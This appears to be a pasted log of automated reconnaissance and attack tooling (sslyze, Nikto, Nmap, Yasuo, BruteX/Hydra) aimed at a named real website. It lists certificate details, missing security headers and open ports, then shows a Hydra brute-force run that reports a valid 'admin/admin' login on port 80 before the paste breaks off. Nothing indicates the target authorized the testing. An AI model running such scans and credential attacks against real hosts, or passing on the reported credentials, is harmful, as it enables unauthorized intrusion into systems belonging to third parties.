  3049. * Deflate Compression:
  3050. OK - Compression disabled
  3051.  
  3052. * Session Renegotiation:
  3053. Client-initiated Renegotiations: OK - Rejected
  3054. Secure Renegotiation: OK - Supported
  3055.  
  3056. * Session Resumption:
  3057. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  3058. With TLS Session Tickets: OK - Supported
  3059.  
  3060. * Certificate - Content:
  3061. SHA1 Fingerprint: 0dbf827a6a853a276163b1e4c6938fed1b8a4e7a
  3062. Common Name: ssl387739.cloudflaressl.com
  3063. Issuer: COMODO RSA Domain Validation Secure Server CA 2
  3064. Serial Number: C5D660AB733EBE7B799B3EEBD9B6BE69
  3065. Not Before: Dec 29 00:00:00 2017 GMT
  3066. Not After: Jul 7 23:59:59 2018 GMT
  3067. Signature Algorithm: sha256WithRSAEncryption
  3068. Public Key Algorithm: rsaEncryption
  3069. Key Size: 2048 bit
  3070. Exponent: 65537 (0x10001)
  3071. X509v3 Subject Alternative Name: {'DNS': ['ssl387739.cloudflaressl.com', '*.cdn2u.com', '*.dynamo-cycling.com', '*.illuminati.am', '*.illuminati.mp', '*.illuminatiofficial.org', '*.invitebyvoice.com', '*.ipay.com.bd', '*.offensivegreetingcards.com', '*.pommadedivine.com', '*.priyo.com', '*.rateareporter.com', '*.take2.co', '*.tero.com', '*.tinanz.com', '*.vandenboss.com', 'cdn2u.com', 'dynamo-cycling.com', 'illuminati.am', 'illuminati.mp', 'illuminatiofficial.org', 'invitebyvoice.com', 'ipay.com.bd', 'offensivegreetingcards.com', 'pommadedivine.com', 'priyo.com', 'rateareporter.com', 'take2.co', 'tero.com', 'tinanz.com', 'vandenboss.com']}
  3072.  
  3073. * Certificate - Trust:
  3074. Hostname Validation: OK - Subject Alternative Name matches
  3075. Google CA Store (09/2015): OK - Certificate is trusted
  3076. Java 6 CA Store (Update 65): OK - Certificate is trusted
  3077. Microsoft CA Store (09/2015): OK - Certificate is trusted
  3078. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  3079. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  3080. Certificate Chain Received: ['ssl387739.cloudflaressl.com', 'COMODO RSA Domain Validation Secure Server CA 2', 'COMODO RSA Certification Authority']
  3081.  
  3082. * Certificate - OCSP Stapling:
  3083. OCSP Response Status: successful
  3084. Validation w/ Mozilla's CA Store: OK - Response is trusted
  3085. Responder Id: D4B0F4FD4F9C42A46CDC3D2EEE5B4118C9AD03F6
  3086. Cert Status: good
  3087. Cert Serial Number: C5D660AB733EBE7B799B3EEBD9B6BE69
  3088. This Update: Dec 31 23:26:35 2017 GMT
  3089. Next Update: Jan 7 23:26:35 2018 GMT
  3090.  
  3091. * SSLV3 Cipher Suites:
  3092. Server rejected all cipher suites.
  3093.  
  3094. * SSLV2 Cipher Suites:
  3095. Server rejected all cipher suites.
  3096.  
  3097.  
  3098.  
  3099. SCAN COMPLETED IN 0.69 S
  3100. ------------------------
  3101. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  3102. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  3103. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  3104. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  3105. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  3106. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  3107. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  3108. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3109. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3110. ░ ░ 
  3111. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  3112. + -- --=[Scan Complete!
  3113. - Nikto v2.1.6
  3114. ---------------------------------------------------------------------------
  3115. + Target IP: 104.24.30.26
  3116. + Target Hostname: illuminatiofficial.org
  3117. + Target Port: 8443
  3118. ---------------------------------------------------------------------------
  3119. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl387740.cloudflaressl.com
  3120. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
  3121. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  3122. + Start Time: 2018-01-05 02:26:10 (GMT-5)
  3123. ---------------------------------------------------------------------------
  3124. + Server: cloudflare-nginx
  3125. + Cookie __cfduid created without the secure flag
  3126. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3127. + Uncommon header 'cf-ray' found, with contents: 3d84b531fdff473a-EWR
  3128. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  3129. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3130. + All CGI directories 'found', use '-C none' to test none
  3131. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  3132. + Hostname 'illuminatiofficial.org' does not match certificate's names: ssl387740.cloudflaressl.com
  3133. + 26106 requests: 5 error(s) and 7 item(s) reported on remote host
  3134. + End Time: 2018-01-05 03:23:52 (GMT-5) (3462 seconds)
  3135. ---------------------------------------------------------------------------
  3136. + 1 host(s) tested
  3137.  
  3138. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 03:24 EST
  3139. Nmap scan report for illuminatiofficial.org (104.24.31.26)
  3140. Host is up (0.11s latency).
  3141. Other addresses for illuminatiofficial.org (not scanned): 2400:cb00:2048:1::6818:1e1a 2400:cb00:2048:1::6818:1f1a 104.24.30.26
  3142.  
  3143. PORT STATE SERVICE VERSION
  3144. 8443/tcp open ssl/http Cloudflare nginx
  3145. |_http-server-header: cloudflare-nginx
  3146. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3147. Device type: general purpose
  3148. Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
  3149. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
  3150. Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
  3151. No exact OS matches for host (test conditions non-ideal).
  3152. Network Distance: 10 hops
  3153.  
  3154. TRACEROUTE (using port 8443/tcp)
  3155. HOP RTT ADDRESS
  3156. 1 109.21 ms 10.13.0.1
  3157. 2 110.37 ms 37.187.24.253
  3158. 3 109.63 ms 10.50.225.60
  3159. 4 110.35 ms 10.17.129.46
  3160. 5 109.61 ms 10.73.0.54
  3161. 6 110.82 ms 10.95.33.10
  3162. 7 113.69 ms be100-1106.gsw-1-a9.fr.eu (91.121.215.177)
  3163. 8 114.21 ms be100-2.th2-1-a9.fr.eu (37.187.36.214)
  3164. 9 114.18 ms equinix-paris.cloudflare.com (195.42.144.143)
  3165. 10 113.71 ms 104.24.31.26
  3166.  
  3167. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3168. Nmap done: 1 IP address (1 host up) scanned in 22.62 seconds
  3169.  + -- --=[Port 8888 closed... skipping.
  3170.  + -- --=[Port 10000 closed... skipping.
  3171.  + -- --=[Port 16992 closed... skipping.
  3172.  + -- --=[Port 27017 closed... skipping.
  3173.  + -- --=[Port 27018 closed... skipping.
  3174.  + -- --=[Port 27019 closed... skipping.
  3175.  + -- --=[Port 28017 closed... skipping.
  3176.  + -- --=[Port 49152 closed... skipping.
  3177.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  3178. #########################################################################################
  3179. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
  3180. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
  3181. `888. .8' .88888. Y88bo. 888 8 888 888
  3182. `888.8' .8' `888. `ZY8888o. 888 8 888 888
  3183. `888' .88ooo8888. `0Y88b 888 8 888 888
  3184. 888 .8' `888. oo .d8P `88. .8' `88b d88'
  3185. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
  3186. Welcome to Yasuo v2.3
  3187. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  3188. #########################################################################################
  3189.  
  3190. I, [2018-01-05T03:24:31.534906 #18654] INFO -- : Initiating port scan
  3191. I, [2018-01-05T03:24:32.834713 #18654] INFO -- : Using nmap scan output file logs/nmap_output_2018-01-05_03-24-31.xml
  3192.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
  3193.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  3194.  __________ __ ____ ___
  3195.  \______ \_______ __ ___/ |_ ____ \ \/ /
  3196.  | | _/\_ __ \ | \ __\/ __ \ \ / 
  3197.  | | \ | | \/ | /| | \ ___/ / \ 
  3198.  |______ / |__| |____/ |__| \___ >___/\ \ 
  3199.  \/ \/ \_/
  3200.  
  3201.  + -- --=[BruteX v1.7 by 1N3
  3202.  + -- --=[http://crowdshield.com
  3203.  
  3204.  
  3205. ################################### Running Port Scan ##############################
  3206.  
  3207. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 03:24 EST
  3208. Nmap scan report for illuminatiofficial.org (104.24.31.26)
  3209. Host is up (0.11s latency).
  3210. Other addresses for illuminatiofficial.org (not scanned): 2400:cb00:2048:1::6818:1e1a 2400:cb00:2048:1::6818:1f1a 104.24.30.26
  3211. Not shown: 23 filtered ports
  3212. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3213. PORT STATE SERVICE
  3214. 80/tcp open http
  3215. 443/tcp open https
  3216. 8080/tcp open http-proxy
  3217.  
  3218. Nmap done: 1 IP address (1 host up) scanned in 2.88 seconds
  3219.  
  3220. ################################### Running Brute Force ############################
  3221.  
  3222.  + -- --=[Port 21 closed... skipping.
  3223.  + -- --=[Port 22 closed... skipping.
  3224.  + -- --=[Port 23 closed... skipping.
  3225.  + -- --=[Port 25 closed... skipping.
  3226.  + -- --=[Port 80 opened... running tests...
  3227. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3228.  
  3229. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-05 03:24:36
  3230. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3231. [DATA] attacking http-get://illuminatiofficial.org:80//
  3232. [80][http-get] host: illuminatiofficial.org login: admin password: admin
  3233. [STATUS] attack finished for illuminatiofficial.org (valid pair found)
  3234. 1 of 1 target successfully completed, 1 valid password found
  3235. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-05 03:24:37
  3236.  + -- --=[Port 110 closed... skipping.
  3237.  + -- --=[Port 139 closed... skipping.
  3238.  + -- --=[Port 162 closed... skipping.
  3239.  + -- --=[Port 389 closed... skipping.
  3240.  + -- --=[Port 443 opened... running tests...
  3241. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3242.  
  3243. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-05 03:24:37
  3244. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3245. [DATA] attacking http-gets://illuminatiofficial.org:443//
  3246. 0 of 1 target completed, 0 valid passwords found
  3247. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-05 03:24:37
  3248.  + -- --=[Port 445 closed... skipping.
  3249.  + -- --=[Port 512 closed... skipping.
  3250.  + -- --=[Port 513 closed... skipping.
  3251.  + -- --=[Port 514 closed... skipping.
  3252.  + -- --=[Port 993 closed... skipping.
  3253.  + -- --=[Port 1433 closed... skipping.
  3254.  + -- --=[Port 1521 closed... skipping.
  3255.  + -- --=[Port 3306 closed... skipping.
  3256.  + -- --=[Port 3389 closed... skipping.
  3257.  + -- --=[Port 5432 closed... skipping.
  3258.  + -- --=[Port 5900 closed... skipping.
  3259.  + -- --=[Port 5901 closed... skipping.
  3260.  + -- --=[Port 8000 closed... skipping.
  3261.  + -- --=[Port 8080 opened... running tests...
  3262. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3263.  
  3264. #######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement